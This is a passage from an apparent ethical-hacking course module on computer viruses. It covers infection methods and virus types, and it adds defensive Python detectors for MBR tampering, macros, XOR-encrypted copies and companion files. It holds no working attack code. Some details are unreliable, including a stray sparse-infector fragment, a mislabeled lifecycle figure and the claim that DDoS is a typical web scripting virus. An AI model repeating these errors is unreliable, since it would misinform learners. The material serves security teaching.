Introduction To Viruses
• A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector, or document
• Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments
• Indications of a virus attack include constant antivirus alerts, suspicious hard drive activity, lack of storage space, unwanted pop-up windows, etc.
Introduction to Viruses
Viruses are the scourge of modern computing. Computer viruses have the potential to wreak
havoc on both business and personal computers. The lifetime of a virus depends on its ability to
reproduce itself. Therefore, attackers design virus code such that the virus replicates
itself n times.
A computer virus is a self-replicating program that produces its code by attaching copies of
itself to other executable code and operates without the knowledge or consent of the user. Like
a biological virus, a computer virus is contagious and can contaminate other files; however,
viruses can infect external machines only with the assistance of computer users.
Some viruses affect computers as soon as their code is executed; other viruses remain dormant
until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as
overlay files (.OVL) and executable files (.EXE, .SYS, .COM, or .BAT). They are transmitted
through file downloads, infected disk/flash drives, and email attachments.
Characteristics of Viruses
The performance of a computer is affected by a virus infection. This infection can lead to data
loss, system crash, and file corruption.
Some of the characteristics of a virus are as follows:
• Infects other programs
• Transforms itself
• Encrypts itself
• Alters data
• Corrupts files and programs
• Replicates itself
Purpose of Creating Viruses
Attackers create viruses with disreputable motives. Criminals create viruses to destroy a
company's data, as an act of vandalism, or to destroy a company's products; however, in some
cases, viruses aid the system.
An attacker creates a virus for the following purposes:
• Inflict damage on competitors
• Realize financial benefits
• Vandalize intellectual property
• Play pranks
• Conduct research
• Engage in cyber-terrorism
• Distribute political messages
• Damage network or computers
• Gain remote access to the victim's computer
Indications of Virus Attack
Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a
virus by interrupting the regular flow of a process or a program. However, not all such anomalies
indicate an attack on the system; some are merely false positives. For example, if the
system runs slower than usual, one may assume that a virus has infected the system; however,
the actual reason might be program overload.
An effective virus tends to multiply rapidly and may infect some machines in a short period.
Viruses can infect files on the system, and when such files are transferred, they can infect
machines of other users who receive them. A virus can also use file servers to infect files.
When a virus infects a computer, the victim or user will be able to identify some indications of
the presence of virus infection.
Some indications of computer virus infection are as follows:
• Processes require more resources and time, resulting in degraded performance
• Computer beeps with no display
• Drive label changes and OS does not load
• Constant antivirus alerts
• Computer freezes frequently or encounters an error such as BSOD
• Files and folders are missing
• Suspicious hard drive activity
• Browser window "freezes"
• Lack of storage space
• Unwanted advertisements and pop-up windows
Stages of Virus Lifecycle
[Figure: Stages of the virus lifecycle. Replication: the virus replicates itself for a period within the target system and then spreads itself. Launch: it gets activated when the user performs certain actions such as running infected programs. Execution of the damage routine: users install antivirus updates and eliminate the virus threats.]
The virus lifecycle includes the following six stages from origin to elimination.
1. Design: Development of virus code using programming languages or construction kits.
2. Replication: The virus replicates for a period within the target system and then spreads
itself.
3. Launch: The virus is activated when the user performs specific actions such as running
an infected program.
4. Detection: The virus is identified as a threat infecting target system.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine: Users install antivirus updates and eliminate the virus
threats.
Working of Viruses
[Figure: Working of viruses. Some viruses infect each time they are run, and others infect only when a certain predefined condition is met, such as a user's specific task, a day, time, or a specific event. Panels: .EXE file before infection and after infection; unfragmented file before attack (File A and File B with their file headers and pages 1 to 3) and the same files after attack.]
Working of Viruses
Viruses can attack a target host's system using a variety of methods. They can attach
themselves to programs and transmit themselves to other programs through specific events.
Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit
themselves using non-executable files. "Trigger" and "direct attack" events can cause a virus to
activate and infect the target system when the user triggers attachments received through
email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then
attack the system's built-in programs, antivirus software, data files, system startup settings, etc.
Viruses have two phases: the infection phase and the attack phase.
• Infection Phase
Programs modified by a virus infection can enable virus functionalities to run on the
system. The virus infects the target system after it is triggered and becomes active upon
the execution of infected programs, because the program code leads to the virus code.
The two most important factors in the infection phase of a virus are as follows:
o Method of infection
o Method of spreading
A virus infects a system in the following sequence:
o The virus loads itself into memory and checks for an executable on the disk.
o The virus appends malicious code to a legitimate program without the permission or
knowledge of the user.
o The user is unaware of the replacement and launches the infected program.
o The execution of the infected program also infects other programs in the system.
o The above cycle continues until the user realizes that there is an anomaly in the
system.
Apparently, the user unknowingly triggers and executes the virus for it to function.
There are many ways to execute programs while the computer is running. For example,
if the user installs any software tool, the setup program calls various built-in sub-programs
during extraction. If a virus program already exists, it can be activated with
this type of execution, and the virus can also infect additional setup programs.
Specific viruses infect in different ways, such as
o A file virus infects by attaching itself to an executable system application program.
Potential targets for virus infections are as follows:
• Source code
• Batch files
• Script files
o Boot sector viruses execute their code before the target PC is booted.
Viruses spread in a variety of ways. There are virus programs that infect and keep
spreading every time the user executes them. Some virus programs do not infect
programs when first executed. They reside in a computer's memory and infect programs
later. Such virus programs wait for a specified trigger event to spread at a later stage.
Therefore, it is difficult to recognize which event might trigger the execution of a
dormant virus. As illustrated in the figure below, the .EXE file's header, when triggered,
executes and starts running the application. Once this file is infected, any trigger event
from the file's header can activate the virus code along with the application program
immediately after executing it.
The most popular methods by which a virus spreads are as follows:
o Infected files: A virus can infect a variety of files.
o File-sharing services: A virus can take advantage of file servers to infect files. When
unsuspecting users open the infected files, their machines also become infected.
o DVDs and other storage media: When infected storage media such as DVDs, flash
drives, and portable hard disks are inserted into a clean system, the system gets
infected.
o Malicious attachments and downloads: A virus spreads if a malicious attachment
sent via email is opened or when apps are downloaded from untrusted sources.
[Figure: A clean file before infection and after infection, showing the entry at "Start of Program" in each case.]
• Attack Phase
Once viruses spread throughout the target system, they start corrupting the files and
programs of the host system. Some viruses can trigger and corrupt the host system only
after the triggering event is activated. Some viruses have bugs that replicate themselves
and perform activities such as deleting files and increasing session time. Viruses corrupt
their targets only after spreading as intended by their developers.
Most viruses that attack target systems perform the following actions:
o Delete files and alter the content of data files, slowing down the system
o Perform tasks not related to applications, such as playing music and creating
animations
[Figure: Unfragmented file before attack (File A, File B); file fragmented due to virus attack.]
The figure shows two files, A and B. Before the attack, the two files are located one after
the other in an orderly manner. Once a virus code infects the file, it alters the position of
the files placed consecutively, leading to inaccuracy in file allocations and causing the
system to slow down as the user tries to retrieve the files.
In the attack phase:
o Viruses execute upon triggering specific events
o Some viruses execute and corrupt via built-in bug programs after being stored in the
host's memory
o The latest and most advanced viruses conceal their presence, attacking only after
thoroughly spreading through the host
How does a Computer Get Infected by Viruses?
To infect a system, first, a virus has to enter it. Once the user downloads and installs the virus
from any source and in any form, it replicates itself to other programs. Then, the virus can
infect the computer in various ways, some of which are listed below:
• Downloads: Attackers incorporate viruses in popular software programs and upload
them to websites intended for download. When a user unknowingly downloads this
infected software and installs it, the system is infected.
• Email attachments: Attackers usually send virus-infected files as email attachments to
spread the virus on the victim's system. When the victim opens the malicious
attachment, the virus automatically infects the system.
• Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office,
etc.) might infect the system as they may contain viruses.
• Failing to install security software: With the increase in security parameters, attackers
are designing new viruses. Failing to install the latest antivirus software or regularly
update it may expose the computer system to virus attacks.
• Updating software: If patches are not regularly installed when released by vendors,
viruses might exploit vulnerabilities, thereby allowing an attacker to access the system.
• Browser: By default, every browser comes with built-in security. An incorrectly
configured browser could result in the automatic running of scripts, which may, in turn,
allow viruses to enter the system.
• Firewall: Disabling the firewall will compromise the security of network traffic and invite
viruses to infect the system.
• Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden
behind the pop-up enters the system. Whenever the user turns on the system, the
installed virus code will run in the background.
• Removable media: When a healthy system is connected to virus-infected removable
media (e.g., CD/DVD, USB drive, card reader), the virus spreads to the system.
• Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or
permitting a file sharing program that is accessed openly will allow a virus to take over
the device.
• Backup and restore: Taking a backup of an infected file and restoring it to a system
infects the system again with the same virus.
• Malicious online ads: Attackers post malicious online ads by embedding malicious code
in the ads, also known as malvertising. Once users click these ads, their computers get
infected.
• Social Media: People tend to click on social media sites, including malicious links shared
by their contacts, which can infect their systems.
Types of Viruses
• Viruses are categorized according to their functioning and targets
• Some of the examples include: Encryption Virus, Shell and File Extension Virus, Terminate & Stay Resident Virus
Types of Viruses
Computer viruses are malicious software programs written by attackers to gain unauthorized
access to a target system. Thus, they compromise the security of the system as well as its
performance. For any virus to corrupt a system, it has to first associate its code with executable
code.
The most common targets for a virus are the system sectors, which include the master boot
record (MBR) and the DOS boot record system sectors. An OS executes code in these areas
while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones
because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during
system booting. This is a crucial point of attack for viruses.
The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses
conceal their code in some other disk space. The primary carriers of system or boot sector
viruses are email attachments and removable media (USB drives). Such viruses reside in
memory. Some sector viruses also spread through infected files; these are known as
multipartite viruses.
A boot sector virus moves MBR to another location on the hard disk and copies itself to the
original location of MBR. When the system boots, first, the virus code executes and then
control passes to the original MBR.
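The relocation just described changes the bytes in the first sector of the disk, so a defender can catch it by parsing that sector and comparing its boot code against a known-good baseline. The following is an added example written for this page, not code from the original text or any vendor: it parses a 512-byte MBR (boot code, four 16-byte partition entries at offset 446, 0x55AA signature at offset 510), hashes the boot-code region, and reports any drift. The sample MBRs and their boot-code bytes are constructed placeholders.

```python
import hashlib
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446      # boot code occupies bytes 0..445
PARTITION_ENTRY_SIZE = 16         # four entries follow the boot code
BOOT_SIGNATURE = b"\x55\xaa"      # stored at bytes 510..511


def parse_mbr(sector: bytes) -> dict:
    """Validate the boot signature, hash the boot code, and decode the partition table."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        start = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        entry = sector[start:start + PARTITION_ENTRY_SIZE]
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) sector-count(4), little-endian
        status, ptype, lba_start, sectors = struct.unpack("<B3xB3xII", entry)
        partitions.append({"bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    boot_code_hash = hashlib.sha256(sector[:PARTITION_TABLE_OFFSET]).hexdigest()
    return {"boot_code_sha256": boot_code_hash, "partitions": partitions}


def check_mbr(sector: bytes, baseline_sha256: str) -> list:
    """Return findings; an empty list means the boot code matches the recorded baseline."""
    info = parse_mbr(sector)
    findings = []
    if info["boot_code_sha256"] != baseline_sha256:
        findings.append("boot code differs from baseline")
    if sum(1 for p in info["partitions"] if p["bootable"]) > 1:
        findings.append("more than one partition flagged bootable")
    return findings


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sample: pad the given boot code to 446 bytes, add one bootable
    type-0x07 partition starting at LBA 2048, three empty entries, and the signature."""
    if len(boot_code) > PARTITION_TABLE_OFFSET:
        raise ValueError("boot code too long")
    code = boot_code.ljust(PARTITION_TABLE_OFFSET, b"\x00")
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 1_000_000)
    return code + entry + b"\x00" * (PARTITION_ENTRY_SIZE * 3) + BOOT_SIGNATURE


# Constructed placeholder boot code for the "before infection" baseline
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 40)
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]
# Constructed "after infection": the boot code region has been replaced, as the text
# describes the virus copying itself to the original location of the MBR
TAMPERED_MBR = build_sample_mbr(b"\xeb\xfe" + b"\x90" * 40)

if __name__ == "__main__":
    print("clean:", check_mbr(CLEAN_MBR, BASELINE))
    print("tampered:", check_mbr(TAMPERED_MBR, BASELINE))
```

On a live system the baseline would be recorded once from a trusted image and the check run from clean boot media, since the stealth techniques described later in this section can intercept reads of the sector.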
[Figure: MBR before infection and after infection.]
• Virus Removal
System sector viruses create the illusion that there is no virus on the system. One way to
deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac,
because Windows is more prone to such attacks. Linux and Macintosh have built-in
safeguards for protection against these viruses. The other approach is to periodically
perform antivirus checks.
File Viruses
File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ,
PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident
viruses.
File viruses insert their code into the original file and infect executable files. Such viruses are
numerous, albeit rare. They infect in a variety of ways and are found in numerous file types.
The most common type of file virus operates by identifying the file type it can infect most
easily, such as that with filenames ending in .COM or .EXE. During program execution, the virus
executes along with program files to infect more files. Overwriting a virus is not easy, as the
overwritten programs no longer function properly. These viruses tend to be found immediately.
Before inserting their code into a program, some file viruses save the original instructions and
allow the original program to execute, so that everything appears normal.
File viruses hide their presence using stealth techniques to reside in a computer's memory in
the same way as system sector viruses. They do not show any increase in file length while
performing directory listing. If a user attempts to read the file, the virus intercepts the request,
and the user gets back his original file. File viruses can infect many file types, as a wide variety
of infection techniques exist.
Figure 7.37: Working of file virus
Multipartite Viruses
A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of
file infectors and boot record infectors and attempts to simultaneously attack both the boot
sector and the executable or program files. When the virus infects the boot sector, it will, in
turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it
is not rooted out entirely from the target machine. Some examples of multipartite viruses
include Invader, Flip, and Tequila.
Macro Viruses
Macro viruses infect Microsoft Word or similar applications by automatically performing a
sequence of actions after triggering an application. Most macro viruses are written using the
macro language Visual Basic for Applications (VBA), and they infect templates or convert
infected documents into template files while maintaining their appearance of common
document files.
Macro viruses are somewhat less harmful than other viruses. They usually spread via email.
Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to
the extensive macro languages used in some programs, easily overlooks the line between a
data file and an executable file. In most cases, just to make things easy for users, the line
between a data file and a program starts to blur only when the default macros are set to run
automatically every time the data file is loaded. Virus writers can exploit universal programs
with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows
Help files can also contain macro code.
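Because the text's point is that a "data file" can carry executable macro code, a useful first check on an incoming Office document is whether it contains a VBA project at all. The example below is added here and is not from the original page: it treats the document as the zip container that modern Office formats use, looks for the `vbaProject.bin` part under `word/`, `xl/`, or `ppt/`, and flags a mismatch when a filename promises a macro-free format but the content carries macros. The sample documents are constructed in memory, and the macro part is a placeholder string rather than real VBA.

```python
import io
import zipfile

# Where Office stores the VBA project inside a macro-enabled OOXML document
MACRO_PART_NAMES = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
MACRO_ENABLED_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".pptm")


def find_macro_parts(data: bytes) -> list:
    """Return the names of embedded VBA project parts in an OOXML (zip) document.
    Non-zip input (e.g. legacy binary .doc) yields [] and needs a different parser."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
    return [n for n in MACRO_PART_NAMES if n in names]


def assess_attachment(filename: str, data: bytes) -> str:
    """'macros' if a VBA part is present, 'extension-mismatch' if the filename claims a
    macro-free format yet the content carries macros, otherwise 'clean'."""
    parts = find_macro_parts(data)
    if parts and not filename.lower().endswith(MACRO_ENABLED_EXTENSIONS):
        return "extension-mismatch"
    return "macros" if parts else "clean"


def build_docx(with_macro: bool) -> bytes:
    """Constructed sample: a minimal zip with a content-types part and a document body;
    optionally a placeholder vbaProject.bin stands in for a real VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"constructed placeholder, not real VBA")
    return buf.getvalue()


if __name__ == "__main__":
    for name, macro in (("report.docx", False), ("report.docm", True), ("report.docx", True)):
        print(name, "->", assess_attachment(name, build_docx(macro)))
```

The check says nothing about what the macros do; it only establishes that the document is executable content and should be handled as such (scanned, sandboxed, or blocked by policy) rather than as plain data.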
Cluster Viruses
Cluster viruses infect files without changing the file or planting additional files. They save the
virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk
read point to the virus code instead of the actual program. Even though the changes in the
directory entry may affect all the programs, only one copy of the virus exists on the disk.
A cluster virus, e.g., Dir-2, first launches itself when any program starts on the computer
system, and control is then passed to the actual program.
This virus infection leads to severe problems if the victim does not know its exact location. If it
infects memory, it controls access to the directory structure on the disk.
If the victim boots from a clean floppy disk and then runs a utility such as CHKDSK, the utility
reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to
correct the problem. If the offer is accepted, the virus infects all the executable files and results
in the loss of original content, or all files might appear to be of the same size.
Stealth Viruses/Tunneling Viruses
These viruses try to hide from antivirus programs by actively altering and corrupting the service
call interrupts while running. The virus code replaces the requests to perform operations with
respect to these service call interrupts. These viruses state false information to hide their
presence from antivirus programs. For example, a stealth virus hides the operations that it
modified and gives false representations. Thus, it takes over portions of the target system and
hides its virus code.
A stealth virus hides from antivirus software by hiding the original size of the file or temporarily
placing a copy of itself in some other system drive, thus replacing the infected file with the
uninfected file that is stored on the hard drive.
In addition, a stealth virus hides the modifications performed by it. It takes control of the
system's functions that read files or system sectors. When another program requests
information that has already been modified by the virus, the stealth virus reports the original
information to the requesting program instead. This virus also resides in memory.
To avoid detection, these viruses always take over system functions and use them to hide their
presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus
attack because a Trojan installs the rootkit and is thus capable of hiding any malware.
[Figure: Stealth virus. The scanner asks "Give me the system file tcpip.sys to scan"; the virus hides the infected TCPIP.SYS and answers "Here you go" with the original TCPIP.SYS.]
• Virus Removal
o Always perform a cold boot {boot from write-protected CD or DVD)
o Never use DOS commands such as FDISK to fix the virus
o Use antivirus software
Encryption Viruses
Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware,
codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an
encrypted copy of the virus and a decryption module. The decryption module remains constant,
whereas the encryption makes use of different keys.
An encryption key consists of a decryption module and an encrypted copy of the code, which
enciphers the virus. When the attacker injects the virus into the target machine, the decryptor
will first execute and decrypt the virus body. Then, the virus body executes and replicates or
becomes resident in the target machine. The replication process is successfully accomplished
using the encryptor. Each virus-infected file uses a different key for encryption. These viruses
employ XOR on each byte with a randomized key. The decryption technique employed is the same
XOR of each byte with the randomized key, which is generated and saved by the root virus.
Encryption viruses block access to target machines or provide victims with limited access to the
system. They use encryption to hide from virus scanners. The virus scanner cannot detect the
encryption virus using signatures, but it can detect the decrypting module.
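The last sentence is the detection lesson: a byte signature taken from the virus body fails against every copy (each is XOR-enciphered under a different key), while a signature on the constant decryptor still matches, and because the key is a single byte stored with the copy, a scanner can also try all 256 keys on the enciphered region and match the plaintext. The following added example (not code from the page; the "copies" are harmless constructed byte strings that only mimic the layout described above) shows both scanner-side approaches.

```python
import hashlib

# Constructed stand-ins: a fixed marker plays the constant decryptor, a label plays the body
DECRYPTOR_STUB = b"CONSTRUCTED-DECRYPTOR-STUB"
VIRUS_BODY = b"constructed sample body: harmless label text"


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_encrypted_copy(key: int) -> bytes:
    """Layout the text describes: constant decryptor, the saved one-byte key, XOR body."""
    return DECRYPTOR_STUB + bytes([key]) + xor_bytes(VIRUS_BODY, key)


def scan(sample: bytes, signatures: dict) -> list:
    """Plain byte-signature scanner: names of every signature found in the sample."""
    return [name for name, sig in signatures.items() if sig in sample]


def scan_with_key_search(sample: bytes, body_sig: bytes):
    """Key-search scan (an assumed scanner strategy, not something the page specifies):
    locate the constant stub, then XOR the region after it with every one-byte key and
    look for the plaintext body signature. Returns the recovered key or None."""
    if DECRYPTOR_STUB not in sample:
        return None
    region = sample[sample.index(DECRYPTOR_STUB) + len(DECRYPTOR_STUB) + 1:]
    for key in range(256):
        if body_sig in xor_bytes(region, key):
            return key
    return None


def demo() -> dict:
    """Three constructed copies under different keys: whole-file hashes all differ, the
    body signature never matches, the stub signature matches every copy."""
    copies = [make_encrypted_copy(k) for k in (0x21, 0x5A, 0xC3)]
    return {
        "distinct_file_hashes": len({hashlib.sha256(c).hexdigest() for c in copies}),
        "body_signature_hits": sum(1 for c in copies if scan(c, {"body": VIRUS_BODY})),
        "stub_signature_hits": sum(1 for c in copies if scan(c, {"stub": DECRYPTOR_STUB})),
    }


if __name__ == "__main__":
    print(demo())
    print("recovered key:", scan_with_key_search(make_encrypted_copy(0x5A), VIRUS_BODY))
```

The key-search step is what separates this class from the polymorphic viruses discussed below: here the decryptor is constant, so both the stub signature and the exhaustive key search stay cheap.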
[Figure: Working of encryption virus. The same virus code is enciphered under different keys (Encryption key 1 produces Virus 1, Encryption key 3 produces Virus 3).]
program to detect the virus, thus allowing the virus to infect the target machine successfully.
[Figure 7.41: Working of sparse infector virus ("Wake up on 15th of every month and execute code").]
Polymorphic Viruses
Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a
decryption module. Polymorphic viruses modify their code for each replication to avoid
detection. They accomplish this by changing the encryption module and the instruction
sequence. Polymorphic mechanisms use random number generators in their implementation.
The general use of the mutation engine is to enable polymorphic code. The mutator provides a
sequence of instructions that a virus scanner can use to optimize an appropriate detection
algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A
simple integrity checker detects the presence of a polymorphic virus in the system's disk.
A polymorphic virus consists of three components: the encrypted virus code, the decryptor
routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus
code. It decrypts the code only after taking control of the computer. The mutation engine
generates randomized decryption routines. Such decryption routines vary whenever the virus
infects a new program.
The polymorphic virus encrypts both the mutation engine and the virus code. When the user
executes a polymorphic-virus-infected program, the decryptor routine takes complete control
of the system, after which it decrypts the virus code and the mutation engine. Next, the
decryption routine transfers system control to the virus, which locates a new program to
infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the
mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new
randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new
copies of both the virus code and the mutation engine. Thus, this virus, along with the newly
encrypted virus code and encrypted mutation engine (EME), appends the new decryption
routine to a new program, thereby continuing the process.
Polymorphic viruses running on target systems are difficult to detect due to the encryption of
the virus body and the changes in the decryption routine each time these viruses infect. It is
difficult for virus scanners to identify these viruses, as no two infections look alike.
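Since no two infections look alike, the text's earlier remark that "a simple integrity checker" still catches polymorphic viruses is the practical takeaway: the infected host program changes, whatever the decryptor looks like. The following added example (written for this page, not taken from it) records a SHA-256 baseline of a directory tree and reports modified, added, and removed files. The tree and the "infection" (bytes appended to one executable, a new file dropped beside it) are constructed in a temporary directory.

```python
import hashlib
import os
import tempfile


def hash_tree(root: str) -> dict:
    """Map every file under root (path relative to root, '/' separators) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            baseline[os.path.relpath(path, root).replace(os.sep, "/")] = digest
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots; content hashes, not sizes or timestamps, decide 'modified'."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed run: baseline a small tree, then append bytes to one executable and
    drop a new file, the two traces an infection leaves on disk."""
    with tempfile.TemporaryDirectory() as root:
        samples = (("bin/app.exe", b"MZ constructed program A"),
                   ("bin/tool.exe", b"MZ constructed program B"),
                   ("readme.txt", b"constructed notes"))
        for rel, content in samples:
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        baseline = hash_tree(root)
        with open(os.path.join(root, "bin", "app.exe"), "ab") as fh:
            fh.write(b" appended constructed bytes")
        with open(os.path.join(root, "bin", "extra.exe"), "wb") as fh:
            fh.write(b"constructed new file")
        return compare(baseline, hash_tree(root))


if __name__ == "__main__":
    print(demo())
```

The checker compares content hashes, so a stealth virus that merely hides file-length changes in directory listings does not defeat it; one that intercepts file reads can, which is why the stealth section above recommends a cold boot from write-protected media before checking.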
[Figure: Working of polymorphic virus. Components: Encrypted Virus Code, Encrypted Mutation Engine (EME), and Decryptor Routine. The decryptor routine decrypts the virus code and the mutation engine; the virus then instructs the engine to create a new DR (decryptor routine) and a new EME, yielding a new virus with a new key.]
[Figure: Metamorphic Engine. This diagram depicts metamorphic malware variants with recorded code: the content in the file before infection (a sample text passage) and the content in the file after infection (every word replaced by "Null").]
Companion/Camouflage Viruses
The companion virus stores itself with the same filename as the target program file. The virus
infects the computer upon executing the file, and it modifies the hard disk data. Companion
viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical
COM file and infects EXE files.
This is what happens. Suppose that a companion virus is executing on the PC and decides that it
is time to infect a file. It looks around and happens to find a file called notepad.exe. It now
creates a file called notepad.com, containing the virus. The virus usually plants this file in the
same directory as the .exe file; however, it can also place it in any directory on the DOS path. If
you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in
sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they
are all in the same directory). The virus executes, possibly infecting more files, and then loads
and executes notepad.exe. The user would probably fail to notice that something is wrong. It is
easy to detect a companion virus just by the presence of the extra COM file in the system.
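The detection hint in the last sentence can be automated: list each directory in search order and flag any .COM whose root name matches an .EXE in the same directory or in a directory searched later, since in both cases the COM file wins the lookup described above. This added example is written for this page, not taken from it; the two search directories and the files in them are constructed in temporary folders.

```python
import os
import tempfile


def find_companions(path_dirs) -> list:
    """Scan directories in search order. Return (com_path, exe_path) pairs where a .COM
    would be picked over an .EXE of the same root name: same directory (COM before EXE)
    or the .COM sits in an earlier directory than the .EXE."""
    entries = []
    for pos, d in enumerate(path_dirs):
        for name in sorted(os.listdir(d)):
            entries.append((pos, d, name))
    exes = [(pos, d, n) for pos, d, n in entries if n.lower().endswith(".exe")]
    hits = []
    for pos, d, n in entries:
        root, ext = os.path.splitext(n.lower())
        if ext != ".com":
            continue
        for epos, ed, en in exes:
            if os.path.splitext(en.lower())[0] == root and epos >= pos:
                hits.append((os.path.join(d, n), os.path.join(ed, en)))
    return hits


def demo() -> list:
    """Constructed layout: notepad.com planted in an earlier search directory than
    notepad.exe (flagged); command.com has no matching .exe and must not be flagged."""
    with tempfile.TemporaryDirectory() as first, tempfile.TemporaryDirectory() as second:
        layout = {first: ["notepad.com", "command.com"], second: ["notepad.exe", "calc.exe"]}
        for d, names in layout.items():
            for n in names:
                with open(os.path.join(d, n), "wb") as fh:
                    fh.write(b"constructed placeholder content")
        return [(os.path.basename(c), os.path.basename(e))
                for c, e in find_companions([first, second])]


if __name__ == "__main__":
    print(demo())
```

On a real system the list of directories would come from the PATH variable, in order; a legitimate .COM (such as command.com in the sample) produces no hit because no .EXE shares its name.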
[Figure: Companion virus. The virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory.]
Shell Viruses
The shell virus code forms a shell around the target host program's code, making itself the
original program with the host code as its sub-routine. Nearly all boot program viruses are shell
viruses.
[Figure: Shell virus. Before infection: Original Program. After infection: Virus Code wrapped around the Original Program.]
[Figure: Windows Folder Options dialog, View tab (Hidden files and folders: "Don't show hidden files, folders, or drives" / "Show hidden files, folders, and drives").]
FAT Viruses
A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in
Microsoft products and some other types of computer systems to access the information
stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer.
FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so
that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly.
Many are designed to overwrite files or directories, and material on a computer can be lost
permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in
addition to destroying data, forcing a user to reformat the computer.
Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to
locate files. The virus can spread to files when the FAT attempts to access them, corrupting the
entire computer eventually. FAT viruses often manifest in the form of corrupted files, with
users noting that files are missing or inaccessible. The FAT architecture itself can also be
changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is
using FAT12.
Logic Bomb Viruses
A logic bomb is a virus that is triggered by a response to an event, such as the launching of an
application or when a specific date/time is reached, where it involves logic to execute the
trigger.
For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The
keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is
designed to wait until you visit a website that requires you to log in with your credentials, such
as a banking site or social network. Consequently, the logic bomb will be triggered to execute
the keylogger, capture your credentials, and send them to a remote attacker.
When a logic bomb is programmed to execute on a specific date, it is referred to as a time
bomb. Time bombs are usually programmed to set off when important dates are reached, such
as Christmas and Valentine's Day.
Web Scripting Viruses
A web scripting virus is a type of computer security vulnerability that breaches your web
browser security through a website. This allows attackers to inject client-side scripting into the
web page. It can bypass access controls and steal information from the web browser. Web
scripting viruses are usually used to attack sites with large populations, such as sites for social
networking, user reviews, and email. Web scripting viruses can propagate slightly faster than
other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send
spam, damage data, and defraud users.
There are two types of web scripting viruses: non-persistent and persistent. Non-persistent
viruses attack you without your knowledge. In the case of a persistent virus, your cookies are
directly stolen, and the attacker can hijack your session, which allows the attacker to
impersonate you and cause severe damage.
• Prevention
The best ways to prevent these viruses and exploits are to validate and escape untrusted
HTML input, enforce cookie security (for example, the HttpOnly and Secure cookie attributes),
disable scripts where they are not needed, and use scanning services such as an antivirus
program with real-time protection for your web browser. It is also advisable to avoid unknown
websites and to use a site-reputation service such as Web of Trust (WOT) to check whether a
site is safe. Signs of infection by a web scripting virus include searches being redirected
elsewhere, the browser background or homepage changing, the computer running slowly and
